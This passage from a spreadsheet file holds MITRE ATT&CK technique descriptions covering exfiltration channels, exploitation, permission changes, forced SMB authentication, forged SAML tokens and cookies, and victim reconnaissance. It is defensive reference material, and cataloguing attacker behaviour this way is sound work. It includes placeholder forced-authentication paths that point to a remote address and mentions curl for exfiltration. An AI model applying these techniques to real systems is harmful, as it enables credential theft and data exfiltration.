[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux &lt;code&gt;curl&lt;/code&gt; may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques) </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 
Asymmetric encryption algorithms are those that use different keys on each end of the channel. Also known as public-key cryptography, this requires pairs of cryptographic keys that can encrypt/decrypt data from the corresponding key. Each end of the communication channels requires a private key (only in the procession of that entity) and the public key of the other entity. The public keys of each entity are exchanged before encrypted communications begin. 
Network protocols that use asymmetric encryption (such as HTTPS/TLS/SSL) often utilize symmetric encryption once keys are exchanged. Adversaries may opt to use these encrypted mechanisms that are baked into a protocol. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 
Symmetric encryption algorithms are those that use shared or the same keys/secrets on each end of the channel. This requires an exchange or pre-arranged agreement/possession of the value used to encrypt and decrypt data. 
Network protocols that use asymmetric encryption often utilize symmetric encryption once keys are exchanged, but adversaries may opt to manually share keys and implement symmetric cryptographic algorithms (ex: RC4, AES) vice using mechanisms that are baked into a protocol. This may result in multiple layers of encryption (in protocols that are natively encrypted such as HTTPS) or encryption in protocols that not typically encrypted (such as HTTP or FTP). </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. 
Adversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. </t>
  </si>
  <si>
    <t>Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.</t>
  </si>
  <si>
    <t>Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.
Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.</t>
  </si>
  <si>
    <t>Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an adversary may opt to exfiltrate data using a Bluetooth communication channel.
Adversaries may choose to do this if they have sufficient access and proximity. Bluetooth connections might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.</t>
  </si>
  <si>
    <t>Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.</t>
  </si>
  <si>
    <t>Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems.</t>
  </si>
  <si>
    <t>Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services.
Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.
Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection.
Exfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network. </t>
  </si>
  <si>
    <t>Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). 
If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)</t>
  </si>
  <si>
    <t>Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Several types exist:
### Browser-based Exploitation
Web browsers are a common target through [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Endpoint systems may be compromised through normal web browsing or from certain users being targeted by links in spearphishing emails to adversary controlled sites used to exploit the web browser. These often do not require an action by the user for the exploit to be executed.
### Office Applications
Common office and productivity applications such as Microsoft Office are also targeted through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious files will be transmitted directly as attachments or through links to download them. These require the user to open the document or file for the exploit to run.
### Common Third-party Applications
Other applications that are commonly seen or are part of the software deployed in a target network may also be used for exploitation. Applications such as Adobe Reader and Flash, which are common in enterprise environments, have been routinely targeted by adversaries attempting to gain access to systems. Depending on the software and nature of the vulnerability, some may be exploited in the browser or require the user to open a file. For instance, some Flash exploits have been delivered as objects within Microsoft Office documents.</t>
  </si>
  <si>
    <t>Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain access to systems. One example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions.(Citation: Technet MS14-068)(Citation: ADSecurity Detecting Forged Tickets) Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained.</t>
  </si>
  <si>
    <t>Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.
Adversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001). The security software will likely be targeted directly for exploitation. There are examples of antivirus software being targeted by persistent threat groups to avoid detection.</t>
  </si>
  <si>
    <t>Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
When initially gaining access to a system, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and software commonly running at higher permissions, that can be exploited to gain higher levels of access on the system. This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable. This could also enable an adversary to move from a virtualized environment, such as within a virtual machine or container, onto the underlying host. This may be a necessary step for an adversary compromising an endpoint system that has been properly configured and limits other privilege escalation methods.
Adversaries may bring a signed vulnerable driver onto a compromised machine so that they can exploit the vulnerability to execute code in kernel mode. This process is sometimes referred to as Bring Your Own Vulnerable Driver (BYOVD).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020) Adversaries may include the vulnerable driver with files delivered during Initial Access or download it to a compromised system via [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) or [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570).</t>
  </si>
  <si>
    <t>Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities,  or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.
There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services.(Citation: NVD CVE-2014-7169)
Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.</t>
  </si>
  <si>
    <t>Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.
Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)</t>
  </si>
  <si>
    <t>Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.</t>
  </si>
  <si>
    <t>Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Many command shell utilities can be used to obtain this information. Examples include &lt;code&gt;dir&lt;/code&gt;, &lt;code&gt;tree&lt;/code&gt;, &lt;code&gt;ls&lt;/code&gt;, &lt;code&gt;find&lt;/code&gt;, and &lt;code&gt;locate&lt;/code&gt;.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather file and directory information (e.g. &lt;code&gt;dir&lt;/code&gt;, &lt;code&gt;show flash&lt;/code&gt;, and/or &lt;code&gt;nvram&lt;/code&gt;).(Citation: US-CERT-TA18-106A)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Modifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory’s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).
Adversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.(Citation: new_rust_based_ransomware)(Citation: bad_luck_blackcat)(Citation: falconoverwatch_blackcat_attack)(Citation: blackmatter_blackcat)(Citation: fsutil_behavior) </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Most Linux and Linux-based platforms provide a standard set of permission groups (user, group, and other) and a standard set of permissions (read, write, and execute) that are applied to each group. While nuances of each platform’s permissions implementation may vary, most of the platforms provide two primary commands used to manipulate file and directory ACLs: &lt;code&gt;chown&lt;/code&gt; (short for change owner), and &lt;code&gt;chmod&lt;/code&gt; (short for change mode).
Adversarial may use these commands to make themselves the owner of files and directories or change the mode if current permissions allow it. They could subsequently lock others out of the file. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004) or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).(Citation: 20 macOS Common Tools and Techniques) </t>
  </si>
  <si>
    <t>Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Windows implements file and directory ACLs as Discretionary Access Control Lists (DACLs).(Citation: Microsoft DACL May 2018) Similar to a standard ACL, DACLs identifies the accounts that are allowed or denied access to a securable object. When an attempt is made to access a securable object, the system checks the access control entries in the DACL in order. If a matching entry is found, access to the object is granted. Otherwise, access is denied.(Citation: Microsoft Access Control Lists May 2018)
Adversaries can interact with the DACLs using built-in Windows commands, such as `icacls`, `cacls`, `takeown`, and `attrib`, which can grant adversaries higher permissions on specific files and folders. Further, [PowerShell](https://attack.mitre.org/techniques/T1059/001) provides cmdlets that can be used to retrieve or modify file and directory DACLs. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards.
In general, adversaries may manipulate, overwrite, or corrupt firmware in order to deny the use of the system or devices. For example, corruption of firmware responsible for loading the operating system for network devices may render the network devices inoperable.(Citation: dhs_threat_to_net_devices)(Citation: cisa_malware_orgs_ukraine) Depending on the device, this attack may also result in [Data Destruction](https://attack.mitre.org/techniques/T1485). </t>
  </si>
  <si>
    <t>Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.
The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.
Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)
Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB)
There are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:
* A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to &lt;code&gt;file[:]//[remote address]/Normal.dotm&lt;/code&gt; to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)
* A modified .LNK or .SCF file with the icon filename pointing to an external reference such as &lt;code&gt;\\[remote address]\pic.png&lt;/code&gt; that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)</t>
  </si>
  <si>
    <t>Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.
Adversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users. The generation of web credentials often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator)
Once forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation: Microsoft SolarWinds Customer Guidance)</t>
  </si>
  <si>
    <t>An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the &lt;code&gt;NotOnOrAfter&lt;/code&gt; value of the &lt;code&gt;conditions ...&lt;/code&gt; element in a token. This value can be changed using the &lt;code&gt;AccessTokenLifetime&lt;/code&gt; in a &lt;code&gt;LifetimeTokenPolicy&lt;/code&gt;.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)</t>
  </si>
  <si>
    <t>Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access.
Adversaries may generate these cookies in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) and other similar behaviors in that the cookies are new and forged by the adversary, rather than stolen or intercepted from legitimate users. Most common web applications have standardized and documented cookie values that can be generated using provided tools or interfaces.(Citation: Pass The Cookie) The generation of web cookies often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.
Once forged, adversaries may use these web cookies to access resources ([Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Volexity SolarWinds)(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).(Citation: ArsTechnica Intel) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Compromise Hardware Supply Chain](https://attack.mitre.org/techniques/T1195/003) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or for initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about users could also be enumerated via other active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks)
Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).</t>
  </si>
  <si>
    <t>Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.
Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect website authentication cookies from visitors.(Citation: ATT ScanBox) Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries may also purchase credentials from dark web or other black-markets. Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).</t>
  </si>
  <si>
    <t>Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.
